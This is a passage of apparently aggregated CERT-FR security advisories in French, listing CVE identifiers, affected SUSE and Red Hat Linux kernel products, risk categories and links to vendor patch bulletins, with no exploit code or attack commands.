"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-39748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39748"
},
{
"name": "CVE-2023-53827",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53827"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2026-23145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23145"
},
{
"name": "CVE-2026-23104",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23104"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2026-23171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23171"
},
{
"name": "CVE-2026-23112",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23112"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-23190",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23190"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2026-23082",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23082"
},
{
"name": "CVE-2026-23155",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23155"
},
{
"name": "CVE-2026-23111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23111"
},
{
"name": "CVE-2026-23113",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23113"
},
{
"name": "CVE-2025-71231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71231"
},
{
"name": "CVE-2023-53794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53794"
},
{
"name": "CVE-2025-68810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68810"
},
{
"name": "CVE-2025-71198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71198"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-68285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68285"
},
{
"name": "CVE-2026-23053",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23053"
},
{
"name": "CVE-2025-71184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71184"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
}
],
"initial_release_date": "2026-03-20T00:00:00",
"last_revision_date": "2026-03-20T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0329",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-20T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de SUSE. Elles permettent \u00e0 un attaquant de provoquer une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es, un d\u00e9ni de service et un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de SUSE",
"vendor_advisories": [
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20674-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620674-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20672-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620672-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20680-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620680-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20699-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620699-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20678-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620678-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20679-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620679-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20702-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620702-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20704-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620704-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20681-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620681-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20700-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620700-1"
},
{
"published_at": "2026-03-18",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0928-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260928-1"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20719-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620719-1"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20711-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620711-1"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20720-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620720-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20701-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620701-1"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20713-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620713-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20703-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620703-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20705-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620705-1"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20667-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620667-1"
},
{
"published_at": "2026-03-05",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20673-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620673-1"
},
{
"published_at": "2026-03-11",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20676-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620676-1"
}
]
}
CERTFR-2026-AVI-0330
Vulnerability from certfr_avis - Published: 2026-03-20 - Updated: 2026-03-20
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire, une élévation de privilèges et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
None| Vendor | Product | Description | ||
|---|---|---|---|---|
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 10 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 10 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian 10 ppc64le | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 10 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 10 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems 10 s390x |
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Red Hat Enterprise Linux for x86_64 10 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 10 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 10 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems 10 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 10 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 10 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 10 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 10 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-38141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38141"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2025-40249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40249"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-39818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39818"
},
{
"name": "CVE-2025-39760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39760"
},
{
"name": "CVE-2025-38703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38703"
},
{
"name": "CVE-2025-38106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38106"
},
{
"name": "CVE-2026-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23156"
},
{
"name": "CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
}
],
"initial_release_date": "2026-03-20T00:00:00",
"last_revision_date": "2026-03-20T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0330",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-20T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Red Hat. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire, une \u00e9l\u00e9vation de privil\u00e8ges et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Red Hat",
"vendor_advisories": [
{
"published_at": "2026-03-09",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:4012",
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
}
]
}
CERTFR-2026-AVI-0369
Vulnerability from certfr_avis - Published: 2026-03-27 - Updated: 2026-03-27
De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SUSE | Public Cloud Module | Public Cloud Module 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing 15 SP5 | ||
| SUSE | SUSE Linux Enterprise High Availability Extension | SUSE Linux Enterprise High Availability Extension 15 SP4 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing ESPOS 15 SP5 | ||
| SUSE | openSUSE Leap | openSUSE Leap 15.5 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP5 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 12 SP5 LTSS | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP6 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing 12 SP5 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing 15 SP4 | ||
| SUSE | SUSE Manager Retail Branch Server | SUSE Manager Retail Branch Server 4.3 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 12-SP5 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 12 SP5 LTSS Extended Security | ||
| SUSE | openSUSE Leap | openSUSE Leap 15.4 | ||
| SUSE | SUSE Linux Enterprise Desktop | SUSE Linux Enterprise Desktop 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP6 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 12 SP5 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 12 SP5 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.2 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP4 LTSS | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP5 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro for Rancher 5.4 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP5 | ||
| SUSE | SUSE Linux Enterprise High Performance Computing | SUSE Linux Enterprise High Performance Computing LTSS 15 SP5 | ||
| SUSE | openSUSE Leap | openSUSE Leap 15.6 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.3 | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP5 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro for Rancher 5.3 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP6 | ||
| SUSE | SUSE Linux Enterprise Workstation Extension | SUSE Linux Enterprise Workstation Extension 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP4 | ||
| SUSE | SUSE Manager Proxy | SUSE Manager Proxy 4.3 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro for Rancher 5.2 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server for SAP Applications 15 SP4 | ||
| SUSE | Basesystem Module | Basesystem Module 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Availability Extension | SUSE Linux Enterprise High Availability Extension 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.5 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP4 | ||
| SUSE | SUSE Linux Enterprise Real Time | SUSE Linux Enterprise Real Time 15 SP6 | ||
| SUSE | SUSE Linux Micro | SUSE Linux Micro 6.1 | ||
| SUSE | Legacy Module | Legacy Module 15-SP7 | ||
| SUSE | SUSE Linux Micro | SUSE Linux Micro 6.0 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP7 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP5 LTSS | ||
| SUSE | SUSE Manager Server | SUSE Manager Server 4.3 | ||
| SUSE | SUSE Linux Enterprise Server | SUSE Linux Enterprise Server 15 SP6 LTSS | ||
| SUSE | SUSE Real Time Module | SUSE Real Time Module 15-SP7 | ||
| SUSE | Development Tools Module | Development Tools Module 15-SP7 | ||
| SUSE | SUSE Linux Enterprise High Availability Extension | SUSE Linux Enterprise High Availability Extension 15 SP6 | ||
| SUSE | SUSE Linux Enterprise Micro | SUSE Linux Enterprise Micro 5.4 | ||
| SUSE | SUSE Linux Enterprise Live Patching | SUSE Linux Enterprise Live Patching 15-SP4 | ||
| SUSE | SUSE Linux Micro Extras | SUSE Linux Micro Extras 6.0 |
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Public Cloud Module 15-SP7",
"product": {
"name": "Public Cloud Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP5",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing ESPOS 15 SP5",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.5",
"product": {
"name": "openSUSE Leap",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 12 SP5",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Retail Branch Server 4.3",
"product": {
"name": "SUSE Manager Retail Branch Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 12-SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5 LTSS Extended Security",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.4",
"product": {
"name": "openSUSE Leap",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Desktop 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Desktop",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing LTSS 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.2",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP4 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing LTSS 15 SP5",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Workstation Extension 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Workstation Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Proxy 4.3",
"product": {
"name": "SUSE Manager Proxy",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.2",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Basesystem Module 15-SP7",
"product": {
"name": "Basesystem Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP7",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.5",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Real Time",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.1",
"product": {
"name": "SUSE Linux Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Legacy Module 15-SP7",
"product": {
"name": "Legacy Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro 6.0",
"product": {
"name": "SUSE Linux Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Manager Server 4.3",
"product": {
"name": "SUSE Manager Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6 LTSS",
"product": {
"name": "SUSE Linux Enterprise Server",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Real Time Module 15-SP7",
"product": {
"name": "SUSE Real Time Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Development Tools Module 15-SP7",
"product": {
"name": "Development Tools Module",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP6",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP4",
"product": {
"name": "SUSE Linux Enterprise Live Patching",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Micro Extras 6.0",
"product": {
